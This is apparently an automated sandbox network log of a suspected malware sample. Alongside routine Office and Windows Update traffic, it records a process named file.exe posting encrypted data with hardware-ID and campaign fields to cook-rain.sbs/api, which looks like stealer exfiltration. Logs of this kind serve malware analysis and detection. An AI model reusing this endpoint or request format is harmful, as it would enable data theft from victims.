                                                                                                                                                                                                            2024-11-21 14:17:24 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 56 76 5d 5b 4d 6d 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120621" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <SR T="2" R="([Vv][Mm][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            42192.168.2.64975113.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-21 14:17:24 UTC192OUTGET /rules/rule120622v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-21 14:17:24 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 14:17:24 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 477
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BB8CEAC16"
                                                                                                                                                                                                            x-ms-request-id: 3c827ba2-d01e-0014-367c-3bed58000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241121T141724Z-178bfbc474bv7whqhC1NYC1fg400000001fg00000000ptbp
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-21 14:17:24 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120622" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            43192.168.2.64975313.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-21 14:17:24 UTC192OUTGET /rules/rule120624v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-21 14:17:24 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 14:17:24 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 494
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BB7010D66"
                                                                                                                                                                                                            x-ms-request-id: e7bb18f6-501e-000a-54a9-3b0180000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241121T141724Z-1777c6cb754xjpthhC1TEBexs80000000azg00000000h5x2
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-21 14:17:24 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120624" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            44192.168.2.64975552.149.20.212443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-21 14:17:25 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=XReSa52zmeSff4o&MD=elPKToF1 HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                            User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                                                                                            Host: slscr.update.microsoft.com
                                                                                                                                                                                                            2024-11-21 14:17:25 UTC560INHTTP/1.1 200 OK
                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                                            Expires: -1
                                                                                                                                                                                                            Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                                                                                            ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                                                                                                                                                                            MS-CorrelationId: 7e20c667-28a5-4678-ae33-7f23578c4d45
                                                                                                                                                                                                            MS-RequestId: 068b796e-ef80-4069-8ce0-b5041c104227
                                                                                                                                                                                                            MS-CV: q1GzMM1XWES/DUye.0
                                                                                                                                                                                                            X-Microsoft-SLSClientCache: 2880
                                                                                                                                                                                                            Content-Disposition: attachment; filename=environment.cab
                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 14:17:24 GMT
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Content-Length: 24490
                                                                                                                                                                                                            2024-11-21 14:17:25 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                                                                                                                                                                                            Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                                                                                                                                                                                            2024-11-21 14:17:25 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                                                                                                                                                                                            Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            45192.168.2.64975713.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-21 14:17:26 UTC192OUTGET /rules/rule120626v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-21 14:17:26 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 14:17:26 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 472
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                                                                                                                                                                            ETag: "0x8DC582B9DACDF62"
                                                                                                                                                                                                            x-ms-request-id: 107b228c-c01e-00a2-1f8c-3a2327000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241121T141726Z-178bfbc474btrnf9hC1NYCb80g00000001ug00000000225k
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-21 14:17:26 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120626" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            46192.168.2.649761188.114.97.34434784C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-21 14:17:26 UTC273OUTPOST /api HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=KZYB29IALIV
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                            Content-Length: 551632
                                                                                                                                                                                                            Host: cook-rain.sbs
                                                                                                                                                                                                            2024-11-21 14:17:26 UTC15331OUTData Raw: 2d 2d 4b 5a 59 42 32 39 49 41 4c 49 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 32 35 34 32 45 37 33 34 39 32 46 45 32 41 43 34 41 46 46 35 41 44 45 43 39 45 36 42 44 37 37 0d 0a 2d 2d 4b 5a 59 42 32 39 49 41 4c 49 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4b 5a 59 42 32 39 49 41 4c 49 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 4b 5a 59 42 32 39 49 41 4c 49 56
                                                                                                                                                                                                            Data Ascii: --KZYB29IALIVContent-Disposition: form-data; name="hwid"12542E73492FE2AC4AFF5ADEC9E6BD77--KZYB29IALIVContent-Disposition: form-data; name="pid"1--KZYB29IALIVContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--KZYB29IALIV
                                                                                                                                                                                                            2024-11-21 14:17:26 UTC15331OUTData Raw: 3c ac b5 67 b9 86 8d 91 8f db 07 24 d3 7e 55 ba 0d 57 0a 7e 7a 8b 8c 70 d9 10 31 81 fb 69 76 2e c7 33 ea 4f 56 ac f9 fe d8 54 e9 06 cb 39 9d 66 8a 5f 52 d8 a5 5f bc 4d aa ad 12 da 0b e0 c6 44 6f c2 94 81 94 e0 d5 a8 e6 6a 4d c4 4c 61 23 b4 79 09 cc 22 b7 46 a3 88 9d ad 0d c2 ea 27 5d 92 32 8b a6 fd b2 46 7d 29 75 0f 57 4e 7e 3e 01 92 d3 c3 b8 d4 e7 a0 ef 59 91 6e 83 8c 7b 60 81 ab 3e 56 8d 3e 2b 09 be b3 4b 39 ff ce b1 d6 ad f4 c0 2b de 25 bd 32 f0 9a 7f 53 b1 11 96 3f cd b7 a9 29 8f ee d2 82 6b 03 f6 45 43 0c 34 6b 26 a9 56 67 84 90 6f 07 36 7f a3 4c 49 e0 d9 fc 85 0b ec e7 63 9d 13 06 9a df 94 eb d9 a8 c6 ed 88 f9 9f 65 53 5e 2a 29 a5 b4 ca cf 96 ed 60 29 b4 bb ff dd 71 46 12 fa ca 7d 8e b3 de db a1 d7 52 0b 83 05 c5 ff 77 fb e4 c2 15 e6 c4 61 65 29 13
                                                                                                                                                                                                            Data Ascii: <g$~UW~zp1iv.3OVT9f_R_MDojMLa#y"F']2F})uWN~>Yn{`>V>+K9+%2S?)kEC4k&Vgo6LIceS^*)`)qF}Rwae)
                                                                                                                                                                                                            2024-11-21 14:17:26 UTC15331OUTData Raw: c4 a7 be 50 d7 c7 aa 8e d0 8a 0d 67 4b 86 06 b5 be f0 3c a9 40 1c 08 89 99 fe fe 35 cb 03 38 14 d8 47 44 f4 11 cf 1a 4b 78 08 34 a5 50 31 0f b7 83 83 04 17 c6 98 1f e7 c2 3e c9 f1 6c bb e5 7e b3 d3 86 46 c4 5e 39 10 0a b1 92 ca 6f 2c b4 0d 19 2f 62 89 8a c1 31 1a ad 7b 64 2e 01 8b 37 3b be f3 87 a7 f5 bb 3f 18 b7 d7 6e 18 4d 17 77 db 3e b7 f5 f8 aa 31 5d cb 6a a9 7d e3 33 a4 a1 42 23 63 e1 ee 41 96 ca 34 23 af 4a bb 9a 5e 1f fd 3d 2f 68 de 79 fa a9 63 da d3 e0 11 69 f1 37 56 b6 be 56 db b5 36 5b d7 11 94 51 5a e3 27 71 c7 7d 6f 62 48 ed 71 60 66 40 31 c2 0d c3 80 b8 76 a2 54 f7 b9 3e 7b f3 b5 24 6b 15 2c e9 e2 16 86 6e a3 c1 b0 24 00 81 01 ff 02 9a e0 64 9a 86 3d 58 6a 68 51 71 d5 06 bf 2a 7f af 2f 41 e4 1e 4c 45 52 58 07 d0 c3 2d 70 15 b8 fd 8b a6 7d 13
                                                                                                                                                                                                            Data Ascii: PgK<@58GDKx4P1>l~F^9o,/b1{d.7;?nMw>1]j}3B#cA4#J^=/hyci7VV6[QZ'q}obHq`f@1vT>{$k,n$d=XjhQq*/ALERX-p}
                                                                                                                                                                                                            2024-11-21 14:17:26 UTC15331OUTData Raw: ad 34 90 e8 ef 7f eb 5e 16 e2 50 24 b2 e7 92 e2 b0 fa 37 40 d8 4b b4 c4 bc c4 12 bf 4c ca 2d 70 83 33 3f a1 25 af 5d 42 71 e5 dc d0 0e 11 d6 8f a0 36 18 e9 89 01 ca 7d 27 e6 a6 8a 2c f5 e6 92 8a 56 91 e8 1c bf fc 32 9c 64 68 b0 f0 0d ef 56 2a 40 db 87 b1 ee ff 8e 8a 71 e6 65 4e 6d 64 1e ce 7f bd de dd 0a 5c 3c df 4a 80 f0 a2 53 e1 4b ed 79 bf 32 ee dd 68 63 db 76 0a d8 f6 7b b2 65 7b 52 84 8c 93 8d a6 22 9d 0d 49 32 59 f2 45 25 80 55 16 79 d1 17 b7 69 24 b4 30 5d be a0 28 71 4a c6 c2 26 c4 93 e7 50 4e cb 04 c8 c5 e7 c7 23 f8 8d 63 49 b3 db a7 df ec e3 d4 a2 4a db 3d c1 33 da d7 c6 ec dc a0 c4 6e 1f 02 37 9e ab ca 84 2b 8d d0 cf ea 6b a2 b2 16 8b 0f d1 ca 25 58 8a 22 7b d6 1a 1e 11 2f 4c 72 df 69 4d ba 6b 10 24 df b6 d5 db b7 ad f3 b7 51 a8 fb 59 6f 8b 29
                                                                                                                                                                                                            Data Ascii: 4^P$7@KL-p3?%]Bq6}',V2dhV*@qeNmd\<JSKy2hcv{e{R"I2YE%Uyi$0](qJ&PN#cIJ=3n7+k%X"{/LriMk$QYo)
                                                                                                                                                                                                            2024-11-21 14:17:26 UTC15331OUTData Raw: f3 0e 9d 36 2f 5d 6b 8d 27 b9 c3 06 35 99 d3 d1 8f ea 90 90 cf c3 33 37 48 a4 d6 6b f3 91 93 bd 12 5a 24 1b 12 3d 39 45 84 2d 52 7b 76 01 13 f0 da 3f 82 3a bd 67 f6 a1 96 b0 a9 c1 5a ef 4d c1 cd 9d d6 dd e3 9d ce 1d 7a 89 20 d8 2a 15 66 2b 73 1b be 21 92 4b 8e 0d 59 38 44 1c 6d 71 68 dc 0d a2 f4 a5 5a b7 76 aa cd 29 20 96 75 a1 3f b1 7f fa a5 0e f8 d1 db 10 a3 ca 79 2f a3 d4 14 9b f0 4c 75 d1 97 27 39 36 8b f6 2d 52 9f 49 6a d7 67 7f fe 53 48 cd 78 89 5a b3 7e d7 71 c3 32 a5 54 34 bd bd a1 84 77 3e 8d 3a 75 c5 2e 71 de 8f d7 90 b7 57 2a d0 3a 20 92 b2 4c 5c f5 2a d1 df 9e b8 7c 85 77 ef 6a d5 40 f0 c0 d9 19 d8 ef 4e 7f 09 c7 3c a7 6a 42 78 0a 46 94 c0 bd 49 42 1a 04 f4 bf 87 bb 9e ce 3a 23 79 d0 a4 07 ed 52 e5 53 ab 8b 30 6d ed cd 81 33 f2 8d 79 af e7 e9
                                                                                                                                                                                                            Data Ascii: 6/]k'537HkZ$=9E-R{v?:gZMz *f+s!KY8DmqhZv) u?y/Lu'96-RIjgSHxZ~q2T4w>:u.qW*: L\*|wj@N<jBxFIB:#yRS0m3y
                                                                                                                                                                                                            2024-11-21 14:17:26 UTC15331OUTData Raw: 42 43 16 89 38 1d f7 e0 e8 8d 1b bd 08 40 ba aa 75 6f 88 72 4c 95 38 59 c2 a6 30 5b 99 e0 50 20 0b b6 0e 0c c7 40 b9 02 e0 4b 76 57 d1 6a 3a a4 ef 0c 58 e2 a4 24 34 2a 37 ad 11 c4 ca 8b 02 f9 3f 2f 71 f2 40 96 19 fb e4 67 ec 14 0e 36 6b c7 81 7c 7d 54 74 b2 95 81 43 a9 50 e0 50 44 6e 1a 5f 34 72 18 8d 99 b5 ae a1 cd 91 16 6c e1 46 1e 62 27 60 63 3b 0f 7c cc d7 a8 76 39 8b bc 20 00 ff b2 cc ad 4d ae ba c4 29 f9 88 3d 4d 17 16 bb 2c 10 f3 7d 74 e7 cc e5 67 96 f2 bd 17 a6 ec d1 b1 bc 19 4d 53 6a a6 ac 7e ba 06 e6 3f af d5 bd 37 81 8f fd 80 68 72 2b a8 9b ad 6b bc e6 32 88 77 c7 c2 1b d9 7d f7 dc 0f 8c ca c1 91 8a a4 33 00 99 e0 15 17 03 b9 dc ab 7e 63 63 1f 48 57 89 a4 13 14 8a 1c b2 0b 3b 2e 0a 62 0e ed b6 c2 93 11 8a 4a b5 d3 b0 5e 45 7d a3 d6 74 90 a2 67
                                                                                                                                                                                                            Data Ascii: BC8@uorL8Y0[P @KvWj:X$4*7?/q@g6k|}TtCPPDn_4rlFb'`c;|v9 M)=M,}tgMSj~?7hr+k2w}3~ccHW;.bJ^E}tg
                                                                                                                                                                                                            2024-11-21 14:17:26 UTC15331OUTData Raw: 5f 5e 5c 62 6c 53 d6 29 16 5e 41 4d 7f ce ac 14 e5 be 9a 4c a2 48 69 6b fc 12 d5 2e 48 e0 44 77 7d 9b 37 b6 0c b6 14 04 6b 73 35 5b 0d 5e 59 6e 69 55 26 a1 14 21 e0 24 a5 6d bb f8 01 c2 41 f4 9e ff 5b 11 1a be e3 d7 15 7e fa 50 97 ac 51 7e d5 fa 8e 63 a5 6e e7 27 04 16 b6 0a 31 21 d6 c4 cd 06 b2 2e 1e 5b 04 ef 54 9e 33 c5 45 c6 68 5e 23 12 9b 5a 19 f7 60 bf 5b 1c 68 ff df 5a 41 59 09 14 f7 7d a2 51 c0 18 ad 0a 51 03 cf d0 5d e0 84 48 2a df f6 b7 31 5a 0a 6f f2 7e 24 e5 f1 14 7e f4 35 d6 26 33 fd 29 3c 1c 02 39 f9 f8 2f 22 ac 12 c0 f8 c1 f8 36 48 0e 7c a3 c0 87 58 8b ab 9e 7a 40 f8 c1 2c 10 b3 a7 96 34 9b 5b 11 82 cf 97 45 a3 0b b9 32 17 e2 06 d4 d3 b0 0c 02 c2 ad 2b a8 cc 8b 26 e7 18 6a 80 4a 64 cc a0 8b 1f 39 cb f0 ee 1b 3c 57 98 84 42 9a ef ee 53 42 ff
                                                                                                                                                                                                            Data Ascii: _^\blS)^AMLHik.HDw}7ks5[^YniU&!$mA[~PQ~cn'1!.[T3Eh^#Z`[hZAY}QQ]H*1Zo~$~5&3)<9/"6H|Xz@,4[E2+&jJd9<WBSB
                                                                                                                                                                                                            2024-11-21 14:17:26 UTC15331OUTData Raw: 94 21 3c 51 62 93 e0 b3 6d c7 cc fc 50 7d d7 79 0a 6e a6 8a fa 47 c8 6c d7 d0 ad 17 76 85 06 ec 3c 73 6c 10 17 35 2c fa fb 75 24 b6 89 c7 61 bd 12 c2 75 f7 31 d2 c4 83 c1 0f 68 e1 d0 98 55 32 b7 61 8a 0c 17 07 63 8e 0b ef 62 b1 0c e6 73 be 79 d1 bf 07 f2 e0 d3 b9 35 9c f7 22 4b 59 f6 89 54 0d 5d a5 44 6f ba ac cd 57 03 6e 89 ef 2d 59 61 89 0a bd 8f 6d 6f 5b 2d f2 e1 74 7f 71 93 8b bc 3b 89 fb b9 e1 73 73 71 23 7a a9 4d 5e a1 ba 76 bb 68 db eb 24 f1 e3 01 75 7c 24 15 f8 47 04 ab f2 2a be 96 61 74 88 d8 d2 4c 1a a3 b4 2b 73 89 05 7c b8 fe 8b 2e 86 fe a4 9b 10 8e 2a e3 e0 9f ed ec 14 83 15 b2 35 b2 94 cc 21 6a e6 3a b5 4d bc c6 07 ed 03 44 44 a0 8b b8 7c e4 94 52 7b 2a b6 77 55 b6 3f 62 bb ec 41 c0 e2 c4 2e fa 69 24 13 c5 18 b9 a6 b1 5f 82 f8 fd b9 75 de 89
                                                                                                                                                                                                            Data Ascii: !<QbmP}ynGlv<sl5,u$au1hU2acbsy5"KYT]DoWn-Yamo[-tq;ssq#zM^vh$u|$G*atL+s|.*5!j:MDD|R{*wU?bA.i$_u
